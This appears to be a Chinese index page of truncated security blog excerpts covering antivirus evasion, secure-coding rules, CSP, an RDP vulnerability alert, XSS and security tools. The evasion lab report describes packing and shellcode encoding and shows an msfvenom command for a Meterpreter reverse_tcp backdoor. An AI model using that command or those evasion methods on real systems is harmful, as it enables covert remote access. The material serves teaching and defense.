网络安全

20169205 2016-2017-2 《网络攻防技术》 免杀技术

孤者浪人 提交于 2020-03-06 06:08:45
20169205 2016-2017-2 《网络攻防技术》 免杀技术 一、基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。 启发式恶意软件检测 基于行为的恶意软件检测 如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码。 (2)免杀是做什么? 使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀。 (3)免杀的基本方法有哪些? 改变特征码 对恶意代码进行加壳、用其他语言或编译器进行再编译,利用shellcode进行编码 改变攻击行为 基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码 实践总结与体会 此次实验使我深入了解了杀毒软件查杀的原理,以及恶意代码的伪装手段。发现即使安装了杀毒软件以及防火墙,还是不能完全的保证电脑是安全的。因此,了解相关恶意程序的原理和伪装手段对提高网络安全意识和增强病毒防护能力由很大的帮助。 离实战还缺些什么技术或步骤? 实际环境中,我们很难将后门程序移植进靶机中,这就需要把这个后门程序伪装后绑定到一些正规的程序中来让后门程序进入靶机。另外我们需要对靶机的状态进行跟踪。 实践过程记录 1.使用msf编码器直接生成一个后门程序 msfvenom -p windows/meterpreter/reverse_tcp

《阿里巴巴开发手册》读书笔记-安全规约

假装没事ソ 提交于 2020-03-05 23:56:02
安全规约 安全规约 安全规约 隶属于用户个人的页面或者功能必须进行权限控制校验 防止没有做水平校验接可以随意访问,修改,删除别人的数据 查看私信内容 修改私人订单 用户敏感数据禁止直接展示,必须对展示数据进行脱敏处理 比如手机号隐藏中间4位,防止隐私泄露 用户输入的SQL参数严格使用参数绑定或者 MATADATA 字段限定,防止SQL注入,禁止字符串拼接SQL访问数据库 用户传入的任何参数必须做有效性验证: 忽略参数校验会导致: page size 过大导致内存溢出 恶意 order by 导致数据库慢查询 任意重定向 SQL注入 反序列化注入 正则输入源串拒绝服务 ReDos Java代码使用正则来验证客户端的输入: 有些正则普通用户输入没有问题 如果攻击人员使用的是特殊构造的字符串来验证,有可能导致死循环的结果 禁止向HTML页面输出未经安全过滤或未正确转义的用户数据 表单,Ajax提交必须执行CSRF安全验证 CSRF(Cross-site request forgery)跨站请求伪造是常见的安全漏洞 对于存在CSRF漏洞的网站或者应用,攻击者可以事先构造好URL,只要受害者用户一访问,后台便在用户不知情的情况下对数据库中的用户参数进行修改 在使用平台资源,比如短信,邮件,电话,下单,支付,必须实现防重放的机制,例如数量限制,疲劳度控制,验证码校验,避免被滥刷而导致资源损耗

Content Security Policy(简称CSP)浏览器内容策略的使用

时光毁灭记忆、已成空白 提交于 2020-03-05 17:37:54
首先要提一下,在做开发测试的过程中,使用chrome时,重新加载更改后的应用时(修改了后端代码的话),要记得清理下缓存。。。清理缓存。。。清理缓存。。。。 前言 最近,项目中需要增加一个代码高亮的小功能,于是在调研后就选择了Prism.js插件,小巧易用,赞!在使用过程中,却遇到了浏览器内容策略限制导致的错误。项目中掉用Prism.highlightElement()方法后,执行方法体里的worker = new Worker()时,报了如下的错误: 再看看响应头中的csp指令都是什么? 显示的是,csp规则中的child-src指令的值未明确指定,回退执行 “default-src none”的安全规则,然而该规则表示禁止加载任何资源,当然也包括项目里使用的prism插件的内容。所以也就报了上面贴出的错误。那么CSP究竟是个神马东东呢? CSP简介 CSP官网 是这样介绍它的:“The new Content-Security-Policy HTTP response header helps you reduce XSS risks on modern browsers by declaring what dynamic resources are allowed to load via a HTTP Header.” 大意是说,通过在http的响应头中设定csp的规则

Web 安全之内容安全策略 (CSP)

对着背影说爱祢 提交于 2020-03-05 17:11:22
内容安全策略 (CSP, Content Security Policy) 是一个附加的安全层,用于帮助检测和缓解某些类型的攻击,包括 跨站脚本攻击 (XSS) 和数据注入等攻击。 这些攻击可用于实现从数据窃取到网站破坏或作为恶意软件分发版本等用途。内容安全策略在现代浏览器中已经包含,使用的是 W3C CSP 1.0 标准中描述的 Content-Security-Policy 头部和指令。 #####那么如何应用? CSP 可以由两种方式指定:HTTP Header 和 HTML。HTTP 是在 HTTP 由增加 Header 来指定,而 HTML 级别则由 Meta 标签指定。 CSP 有两类:Content-Security-Policy 和 Content-Security-Policy-Report-Only。(大小写无关) HTTP header : "Content-Security-Policy:" 策略 "Content-Security-Policy-Report-Only:" 策略 HTTP Content-Security-Policy 头可以指定一个或多个资源是安全的,而Content-Security-Policy-Report-Only则是允许服务器检查(非强制)一个策略。多个头的策略定义由优先采用最先定义的。 HTML Meta : <meta

【漏洞预警】CVE-2019-0708 | Windows远程桌面服务远程执行代码漏洞

夙愿已清 提交于 2020-03-05 12:45:46
发布时间: 2019-05-14 来源 当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 若要利用此漏洞,攻击者需要通过 RDP 向目标系统远程桌面服务发送经特殊设计的请求。 此安全更新通过更正远程桌面服务处理连接请求的方式来修复此漏洞。 ---------------------------- 【漏洞预警】Windows RDP 远程代码执行高危漏洞CVE-2019-0708 2019年5月15日,微软官方发布紧急安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,利用此漏洞可能可以直接获取Windows服务器权限。 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器

大数据时代网络安全出现的问题

荒凉一梦 提交于 2020-03-05 12:06:11
大数据与网络安全是时下的学术热词。在大数据背景下,网络安全面临着严峻的挑战。 一、信息访问权限混乱 访问权限,是指根据在各种预定义的组中用户的身份标识及其成员身份来限制某些信息项或某些控制的机制。一般来说,主要是由系统管理员来控制外来人员访问本区域的网络资源,在此情况下,通常只有被授予了访问权限才能访问此网站。然而,随着互联网技术的迅速发展,信息访问权限出现了混乱不堪的局面。各种信息铺天盖地,随之访问权限也出现了“大锅粥”,各种权限逐渐弱化,许多信息源没有了权限界定甚至出现混乱。 二、数据集群泄露严重 随着数据值的增大和数据的集中,对海量数据进行安全防护变得愈加困难,网络空间中信息的泄露风险来源涵盖范围非常广,数据的大量汇集和集中存储不可避免地增加了用户数据的泄露风险,这些数据成为维护公共安全的重要工作。另一方面,这些机构在数据的储存能力和数据处理能力方面远远跟不上数据量的增长速度,信息处理能力亟待提高。 三、智能终端危险化 智能终端目前在全球占有很大的市场,可以预想到在未来会具有良好的发展前景,走智能终端化的道路也是时代的要求。智能终端就是将大量的个人信息储存在移动终端中,便于个人携带,比如许多企业将大量的企业信息包括员工信息都存储在智能终端中,便于领导随时集中管理。然而,将大数据储存在智能终端中有很大的安全问题。 大数据时代,每个人的生活中都不存在所谓的绝对“秘密”

申请企业SSL证书的重要性

旧城冷巷雨未停 提交于 2020-03-05 10:56:53
现今社会,我们的日常生活已经和互联网密不可分了,身在互联网+时代,用网络进行交易已经成为了我们的日常。但另一方面,互联网也一直存在不安全性。数据泄露、网络虚假信息等违法行为,已经严重影响互联网经济的正常发展,让人们在依赖互联网的同时,质疑互联网安全,畏惧互联网交易。 对于***而言,要截取一个网站的用户信息是一件十分简单的事情。他们可以在用户提交账号密码的时候,截取到用户的数据包,从而获取到用户的账号密码信息。这个安全漏洞,是由于http协议是使用明文传输而产生的。只要网站是http协议的网站,就能截取得到。这对于企业网站来说,是一个非常严重的问题。 但是如果您的企业网站是部署了企业SSL证书的,那么您的网站就会采用https协议进行加密传输数据。***纵然能截获得到用户数据包,但由于数据包是经过加密的,所以***也无法得到用户的账号密码信息。用户能安心地去浏览我们的网页,对于用户来说是一种尊重。但假如一个网站不能保证自己网页的安全,也就不会得到用户的信赖。因此,安信SSL证书认为,为您的企业网站部署一张SSL证书,就是一个能很好的保护用户数据安全的最有效方法之一。 SSL证书是由受信任的CA机构颁发的,具有服务器身份验证和数据传输加密功能。那么企业启用SSL证书会带来哪些好处呢? 1、网站更加安全,https采用SSL加密传输数据,保证了数据传输通路上的安全。 2

微盟删库事件对等保工作开展的启示

孤街浪徒 提交于 2020-03-05 10:11:30
2020年02月23微盟研发中心运维部核心运维人员通过VPN登入服务器,并对线上生产环境进行了恶意破坏。微盟内部系统监控报警,出现大面积服务集群无法响应,目前犯罪嫌疑人已被宝山区公安局刑事拘留,承认了犯罪事实。受此影响,微盟集团市值约蒸发12.53亿港元。 微盟删库事件在IT圈引起了广泛关注讨论,尤其是运维、网络信息安全的从业者中。今天我们从网络信息安全等级保护的思路去分析讨论微盟删库事件对我们的启示。由于资料有限,难免会有不妥之处,这里仅做一些理论层面的分析,供大家参考。 微盟企业负责人视角 首先是经济上的惨痛损失。 本次事件对微盟自身及行业都有较大影响,据相关统计,截至2020年2月25日10点整,微盟集团报5.620港元,跌幅5.23%。2月24日至2月25日10点整,微盟集团市值因此约蒸发 12.53亿港元。 对于微盟的老用户,将面临超过5天的系统故障。对疫情期间本来正在经受门店歇业重创的商家来说,则是双重致命打击,真可谓雪上加霜。该部分的经济损失不可估量。 然后是微盟的社会公信力受到较大影响。 此事件或将极大影响微盟的社会形象和商业生态。难免会让公众质疑其管理、服务和技术。 最后,如何加强对员工的关怀,尤其是核心员工的关注及必要的帮助,也是各单位需高度重视的工作 。这方面必须向我党学习! 删库者视角 可能面临的法律惩罚: 1、根据 《网络安全法》第二十七条:

XSS跨站脚本攻击

我的未来我决定 提交于 2020-03-04 07:30:55
XSS跨站脚本攻击 跨站脚本攻击 XSS ,是最普遍的 Web 应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 类型 反射型 XSS : 攻击者事先制作好攻击链接,需要欺骗用户自己去点击链接才能触发 XSS 代码,所谓反射型 XSS 就是将恶意用户输入的 js 脚本,反射到浏览器执行。 存储型 XSS :代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃 cookie ,也被称为持久型 XSS 。 DOM 型 XSS :类似于反射型XSS,但这种 XSS 攻击的实现是通过对 DOM 树的修改而实现的。 原理 当动态页面中插入的内容含有这些特殊字符如 < 时,用户浏览器会将其误认为是插入了 HTML 标签,当这些 HTML 标签引入了一段 JavaScript 脚本时,这些脚本程序就将会在用户浏览器中执行。当这些特殊字符不能被动态页面检查或检查出现失误时,就将会产生 XSS 漏洞。 攻击者可以使用户在浏览器中执行其预定义的恶意脚本,劫持用户会话,插入恶意内容、重定向链接、使用恶意软件劫持用户浏览器等等。 基于反射型

信息系统安全测评工具

ぃ、小莉子 提交于 2020-03-04 00:52:31
渗透测试使用的工具如下: SuperScan3 X-Scan-v3.3安全扫描软件 IBM Appscan(WEB应用扫描) MatriXay(SQL注入扫描) WEBTOOL V4.2 网站安全检测工具: Metasploit(远程溢出工具集合)等等。 漏洞扫描工具: 绿盟RSAS NX3 Series 启明星辰天镜 来源: CSDN 作者: Liamvi 链接: https://blog.csdn.net/leintor/article/details/104635829